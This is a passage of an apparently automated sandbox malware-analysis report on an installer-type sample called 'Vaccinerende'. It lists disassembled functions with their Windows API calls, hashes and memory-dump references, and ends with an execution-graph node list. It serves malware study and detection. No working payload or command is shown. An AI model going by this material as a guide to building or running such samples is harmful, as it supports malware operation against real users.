                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,7570D4C4,00403589), ref: 00405DA6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: nsa
                                                                              • API String ID: 1716503409-2209301699
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                                              Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                              Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                              Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                              Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                                                              Execution Graph

                                                                              Execution Coverage:5.4%
                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                              Signature Coverage:3.6%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:70
                                                                              execution_graph 37553 44dea5 37554 44deb5 FreeLibrary 37553->37554 37555 44dec3 37553->37555 37554->37555 37556 4147f3 37559 414561 37556->37559 37558 414813 37560 41456d 37559->37560 37561 41457f GetPrivateProfileIntW 37559->37561 37564 4143f1 memset _itow WritePrivateProfileStringW 37560->37564 37561->37558 37563 41457a 37563->37558 37564->37563 37565 44def7 37566 44df07 37565->37566 37567 44df00 ??3@YAXPAX 37565->37567 37568 44df17 37566->37568 37569 44df10 ??3@YAXPAX 37566->37569 37567->37566 37570 44df27 37568->37570 37571 44df20 ??3@YAXPAX 37568->37571 37569->37568 37572 44df37 37570->37572 37573 44df30 ??3@YAXPAX 37570->37573 37571->37570 37573->37572 37574 4287c1 37575 4287d2 37574->37575 37580 429ac1 37574->37580 37577 428818 37575->37577 37578 42881f 37575->37578 37589 425711 37575->37589 37576 4259da 37637 416760 11 API calls 37576->37637 37611 42013a 37577->37611 37639 420244 97 API calls 37578->37639 37607 425ad6 37580->37607 37644 415c56 11 API calls 37580->37644 37583 4260dd 37638 424251 120 API calls 37583->37638 37585 4259c2 37585->37607 37631 415c56 11 API calls 37585->37631 37589->37576 37589->37580 37589->37585 37592 422aeb memset memcpy memcpy 37589->37592 37593 429a4d 37589->37593 37598 4260a1 37589->37598 37610 425a38 37589->37610 37627 4227f0 memset memcpy 37589->37627 37628 422b84 15 API calls 37589->37628 37629 422b5d memset memcpy memcpy 37589->37629 37630 422640 13 API calls 37589->37630 37632 4241fc 11 API calls 37589->37632 37633 42413a 90 API calls 37589->37633 37592->37589 37595 429a66 37593->37595 37596 429a9b 37593->37596 37640 415c56 11 API calls 37595->37640 37597 429a96 37596->37597 37642 416760 11 API calls 37596->37642 37643 424251 120 API calls 37597->37643 37636 415c56 11 API calls 37598->37636 37600 429a7a 37641 416760 11 API calls 37600->37641 37610->37585 37634 422640 13 API calls 37610->37634 37635 4226e0 12 API calls 37610->37635 37612 42014c 37611->37612 37615 420151 37611->37615 37654 41e466 97 API calls 37612->37654 37614 420162 37614->37589 37615->37614 37616 4201b3 37615->37616 37617 420229 37615->37617 37618 4201b8 37616->37618 37619 4201dc 37616->37619 37617->37614 37620 41fd5e 86 API calls 37617->37620 37645 41fbdb 37618->37645 37619->37614 37623 4201ff 37619->37623 37651 41fc4c 37619->37651 37620->37614 37623->37614 37626 42013a 97 API calls 37623->37626 37626->37614 37627->37589 37628->37589 37629->37589 37630->37589 37631->37576 37632->37589 37633->37589 37634->37610 37635->37610 37636->37576 37637->37583 37638->37607 37639->37589 37640->37600 37641->37597 37642->37597 37643->37580 37644->37576 37646 41fbf1 37645->37646 37647 41fbf8 37645->37647 37650 41fc39 37646->37650 37669 4446ce 11 API calls 37646->37669 37659 41ee26 37647->37659 37650->37614 37655 41fd5e 37650->37655 37652 41ee6b 86 API calls 37651->37652 37653 41fc5d 37652->37653 37653->37619 37654->37615 37658 41fd65 37655->37658 37656 41fdab 37656->37614 37657 41fbdb 86 API calls 37657->37658 37658->37656 37658->37657 37660 41ee41 37659->37660 37661 41ee32 37659->37661 37670 41edad 37660->37670 37673 4446ce 11 API calls 37661->37673 37665 41ee3c 37665->37646 37667 41ee58 37667->37665 37675 41ee6b 37667->37675 37669->37650 37679 41be52 37670->37679 37673->37665 37674 41eb85 11 API calls 37674->37667 37676 41ee70 37675->37676 37677 41ee78 37675->37677 37732 41bf99 86 API calls 37676->37732 37677->37665 37680 41be6f 37679->37680 37681 41be5f 37679->37681 37685 41be8c 37680->37685 37711 418c63 memset memset 37680->37711 37710 4446ce 11 API calls 37681->37710 37684 41be69 37684->37665 37684->37674 37685->37684 37686 41bf3a 37685->37686 37688 41bed1 37685->37688 37698 41bee7 37685->37698 37714 4446ce 11 API calls 37686->37714 37690 41bef0 37688->37690 37692 41bee2 37688->37692 37691 41bf01 37690->37691 37690->37698 37693 41bf24 memset 37691->37693 37695 41bf14 37691->37695 37712 418a6d memset memcpy memset 37691->37712 37700 41ac13 37692->37700 37693->37684 37713 41a223 memset memcpy memset 37695->37713 37698->37684 37715 41a453 86 API calls 37698->37715 37699 41bf20 37699->37693 37701 41ac52 37700->37701 37702 41ac3f memset 37700->37702 37704 41ac6a 37701->37704 37716 41dc14 19 API calls 37701->37716 37709 41acd9 37702->37709 37705 41aca1 37704->37705 37717 41519d 37704->37717 37707 41acc0 memset 37705->37707 37708 41accd memcpy 37705->37708 37705->37709 37707->37709 37708->37709 37709->37698 37710->37684 37711->37685 37712->37695 37713->37699 37714->37698 37716->37704 37720 4175ed 37717->37720 37728 417570 SetFilePointer 37720->37728 37723 41760a ReadFile 37724 417637 37723->37724 37725 417627 GetLastError 37723->37725 37726 4151b3 37724->37726 37727 41763e memset 37724->37727 37725->37726 37726->37705 37727->37726 37729 4175b2 37728->37729 37730 41759c GetLastError 37728->37730 37729->37723 37729->37726 37730->37729 37731 4175a8 GetLastError 37730->37731 37731->37729 37732->37677 37733 417bc5 37734 417c61 37733->37734 37739 417bda 37733->37739 37735 417bf6 UnmapViewOfFile CloseHandle 37735->37735 37735->37739 37737 417c2c 37737->37739 37745 41851e 20 API calls 37737->37745 37739->37734 37739->37735 37739->37737 37740 4175b7 37739->37740 37741 4175d6 CloseHandle 37740->37741 37742 4175c8 37741->37742 37743 4175df 37741->37743 37742->37743 37744 4175ce Sleep 37742->37744 37743->37739 37744->37741 37745->37737 37746 4148b6 FindResourceW 37747 4148cf SizeofResource 37746->37747 37750 4148f9 37746->37750 37748 4148e0 LoadResource 37747->37748 37747->37750 37749 4148ee LockResource 37748->37749 37748->37750 37749->37750 37751 441b3f 37761 43a9f6 37751->37761 37753 441b61 37934 4386af memset 37753->37934 37755 44189a 37756 442bd4 37755->37756 37757 4418e2 37755->37757 37758 4418ea 37756->37758 37936 441409 memset 37756->37936 37757->37758 37935 4414a9 12 API calls 37757->37935 37762 43aa20 37761->37762 37763 43aadf 37761->37763 37762->37763 37764 43aa34 memset 37762->37764 37763->37753 37765 43aa56 37764->37765 37766 43aa4d 37764->37766 37937 43a6e7 37765->37937 37945 42c02e memset 37766->37945 37771 43aad3 37947 4169a7 11 API calls 37771->37947 37772 43aaae 37772->37763 37772->37771 37787 43aae5 37772->37787 37773 43ac18 37776 43ac47 37773->37776 37949 42bbd5 memcpy memcpy memcpy memset memcpy 37773->37949 37777 43aca8 37776->37777 37950 438eed 16 API calls 37776->37950 37780 43acd5 37777->37780 37952 4233ae 11 API calls 37777->37952 37953 423426 11 API calls 37780->37953 37781 43ac87 37951 4233c5 16 API calls 37781->37951 37785 43ace1 37954 439811 163 API calls 37785->37954 37786 43a9f6 161 API calls 37786->37787 37787->37763 37787->37773 37787->37786 37948 439bbb 22 API calls 37787->37948 37789 43acfd 37795 43ad2c 37789->37795 37955 438eed 16 API calls 37789->37955 37791 43ad19 37956 4233c5 16 API calls 37791->37956 37792 43ad58 37957 44081d 163 API calls 37792->37957 37795->37792 37798 43add9 37795->37798 37797 43ae3a memset 37799 43ae73 37797->37799 37798->37798 37961 423426 11 API calls 37798->37961 37962 42e1c0 147 API calls 37799->37962 37800 43adab 37959 438c4e 163 API calls 37800->37959 37803 43ad6c 37803->37763 37803->37800 37958 42370b memset memcpy memset 37803->37958 37804 43adcc 37960 440f84 12 API calls 37804->37960 37805 43ae96 37963 42e1c0 147 API calls 37805->37963 37809 43aea8 37810 43aec1 37809->37810 37964 42e199 147 API calls 37809->37964 37812 43af00 37810->37812 37965 42e1c0 147 API calls 37810->37965 37812->37763 37815 43af1a 37812->37815 37816 43b3d9 37812->37816 37966 438eed 16 API calls 37815->37966 37821 43b3f6 37816->37821 37826 43b4c8 37816->37826 37818 43b60f 37818->37763 38025 4393a5 17 API calls 37818->38025 37819 43af2f 37967 4233c5 16 API calls 37819->37967 38007 432878 12 API calls 37821->38007 37823 43af51 37968 423426 11 API calls 37823->37968 37825 43b4f2 38014 43a76c 21 API calls 37825->38014 37826->37825 38013 42bbd5 memcpy memcpy memcpy memset memcpy 37826->38013 37828 43af7d 37969 423426 11 API calls 37828->37969 37832 43b529 38015 44081d 163 API calls 37832->38015 37833 43b462 38009 423330 11 API calls 37833->38009 37834 43af94 37970 423330 11 API calls 37834->37970 37838 43b47e 37842 43b497 37838->37842 38010 42374a memcpy memset memcpy memcpy memcpy 37838->38010 37839 43b544 37843 43b55c 37839->37843 38016 42c02e memset 37839->38016 37840 43b428 37840->37833 38008 432b60 16 API calls 37840->38008 37841 43afca 37971 423330 11 API calls 37841->37971 38011 4233ae 11 API calls 37842->38011 38017 43a87a 163 API calls 37843->38017 37849 43afdb 37972 4233ae 11 API calls 37849->37972 37851 43b56c 37854 43b58a 37851->37854 38018 423330 11 API calls 37851->38018 37852 43b4b1 38012 423399 11 API calls 37852->38012 37853 43afee 37973 44081d 163 API calls 37853->37973 38019 440f84 12 API calls 37854->38019 37859 43b4c1 38021 42db80 163 API calls 37859->38021 37861 43b592 38020 43a82f 16 API calls 37861->38020 37864 43b5b4 38022 438c4e 163 API calls 37864->38022 37866 43b5cf 38023 42c02e memset 37866->38023 37868 43b1ef 37984 4233c5 16 API calls 37868->37984 37869 43b005 37869->37763 37872 43b01f 37869->37872 37974 42d836 163 API calls 37869->37974 37872->37868 37982 423330 11 API calls 37872->37982 37983 42d71d 163 API calls 37872->37983 37873 43b212 37985 423330 11 API calls 37873->37985 37874 43b087 37975 4233ae 11 API calls 37874->37975 37879 43b22a 37986 42ccb5 11 API calls 37879->37986 37880 43b09a 37882 43b10f 37880->37882 37976 42cc15 19 API calls 37880->37976 37977 4233ae 11 API calls 37880->37977 37978 423330 11 API calls 37882->37978 37883 43b23f 37987 4233ae 11 API calls 37883->37987 37885 43b257 37988 4233ae 11 API calls 37885->37988 37889 43b129 37979 4233ae 11 API calls 37889->37979 37890 43b26e 37989 4233ae 11 API calls 37890->37989 37893 43b282 37990 43a87a 163 API calls 37893->37990 37895 43b13c 37980 440f84 12 API calls 37895->37980 37897 43b29d 37991 423330 11 API calls 37897->37991 37900 43b15f 37981 4233ae 11 API calls 37900->37981 37901 43b2af 37903 43b2b8 37901->37903 37904 43b2ce 37901->37904 37992 4233ae 11 API calls 37903->37992 37993 440f84 12 API calls 37904->37993 37907 43b2da 37994 42370b memset memcpy memset 37907->37994 37908 43b2c9 37995 4233ae 11 API calls 37908->37995 37911 43b2f9 37996 423330 11 API calls 37911->37996 37913 43b30b 37997 423330 11 API calls 37913->37997 37915 43b325 37998 423399 11 API calls 37915->37998 37917 43b332 37999 4233ae 11 API calls 37917->37999 37919 43b354 38000 423399 11 API calls 37919->38000 37921 43b364 38001 43a82f 16 API calls 37921->38001 37923 43b370 38002 42db80 163 API calls 37923->38002 37925 43b380 38003 438c4e 163 API calls 37925->38003 37927 43b39e 38004 423399 11 API calls 37927->38004 37929 43b3ae 38005 43a76c 21 API calls 37929->38005 37931 43b3c3 38006 423399 11 API calls 37931->38006 37933 43add4 37933->37818 38024 438f86 16 API calls 37933->38024 37934->37755 37935->37758 37936->37756 37938 43a6f5 37937->37938 37939 43a765 37937->37939 37938->37939 38026 42a115 37938->38026 37939->37763 37946 4397fd memset 37939->37946 37943 43a73d 37943->37939 37944 42a115 147 API calls 37943->37944 37944->37939 37945->37765 37946->37772 37947->37763 37948->37787 37949->37776 37950->37781 37951->37777 37952->37780 37953->37785 37954->37789 37955->37791 37956->37795 37957->37803 37958->37800 37959->37804 37960->37933 37961->37797 37962->37805 37963->37809 37964->37810 37965->37810 37966->37819 37967->37823 37968->37828 37969->37834 37970->37841 37971->37849 37972->37853 37973->37869 37974->37874 37975->37880 37976->37880 37977->37880 37978->37889 37979->37895 37980->37900 37981->37872 37982->37872 37983->37872 37984->37873 37985->37879 37986->37883 37987->37885 37988->37890 37989->37893 37990->37897 37991->37901 37992->37908 37993->37907 37994->37908 37995->37911 37996->37913 37997->37915 37998->37917 37999->37919 38000->37921 38001->37923 38002->37925 38003->37927 38004->37929 38005->37931 38006->37933 38007->37840 38008->37833 38009->37838 38010->37842 38011->37852 38012->37859 38013->37825 38014->37832 38015->37839 38016->37843 38017->37851 38018->37854 38019->37861 38020->37859 38021->37864 38022->37866 38023->37933 